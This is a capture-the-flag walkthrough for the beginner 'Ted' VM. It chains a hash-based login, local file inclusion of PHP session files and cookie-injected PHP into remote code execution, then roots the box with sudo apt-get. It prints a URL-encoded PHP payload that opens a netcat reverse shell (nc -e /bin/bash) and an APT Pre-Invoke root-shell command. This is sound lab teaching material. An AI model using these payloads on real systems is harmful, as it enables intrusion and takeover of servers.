Today we are going to take a new challenge, Ted. The credit for making this VM machine goes to “Avraham Cohen” and it is a boot2root challenge where we have to root the server to complete the challenge. You can download this VMhere
Security Level: Beginner
Penetrating Methodology:
Scanning
· Netdiscover
· NMAP
Enumeration
· Browsing the website
· Burpsuite
Exploitation
· Netcat
Privilege Escalation
· Sudo permission for the apt-get command
Walkthrough:
Scanning:
First thing first, scan the vulnerable machine using nmap
nmap -p- -A 192.168.1.10
Here we found that the only port open is port 80
Let’s take a look at what the port 80 has to offer, we open the IP address in the browser and we found a login page
We tried to attempt some common default passwords but remain unsuccessful, but found something different. There is no error message displayed on the webpage, when we took a look at the response in burp-suite we found that the response asks us to provide the password in hash form
Now we know how to supply but don’t know which specific hashing algorithm. So we tried multiple algorithms like MD5, MD4, SHA-1, RIPEMD, etc. And found that SHA-256 is the correct algorithm and it worked for hash value of admin as password.
Once logged in, we found a simple file browser which helps in reading files from the file system of the target environment. We tried to read the contents of /etc/passwd and it displayed the contents
As the file browser works as a File Inclusion module in the current web environment, we tried to exploit the File Inclusion module with Remote File Inclusion vulnerability but failed.
Then we tried to read various critical files but were only able to read files not of much worth, except the session details which are stored in the file system of the server in the following way
/var/lib/php/sessions/sess_
Here we found that all the session cookies and their values are stored in the session file of the user
We tried exploiting user_pref cookieby inputting a small php code to get output of the ifconfig command
The code we are trying to inject is
After encoding. the characters in URL encoding, the code looks something like this
%3c%3fphp%20system%28%22ifconfig%22%29%3f%3e
As we found that we are able to create a Remote Code Execution vulnerability, let’s try to get a netcat reverse shell
The php code we tried looks something like this
After encoding into URL Encoding, the code looks something like this
%3c%3fphp%20system%28%22nc%20192.168.1.7%201234%20-e%20%2fbin%2fbash%22%29%3f%3e
Once receiving a reverse shell, all we have to do is get the privilege escalated. After spawning a tty shell, we tried to check for sudo permissions of the current user(www-data)
sudo –l
Here we found that we can run the apt-get command with sudo privileges, let’s do that
sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh
You can find more details about privilege escalation through APT here
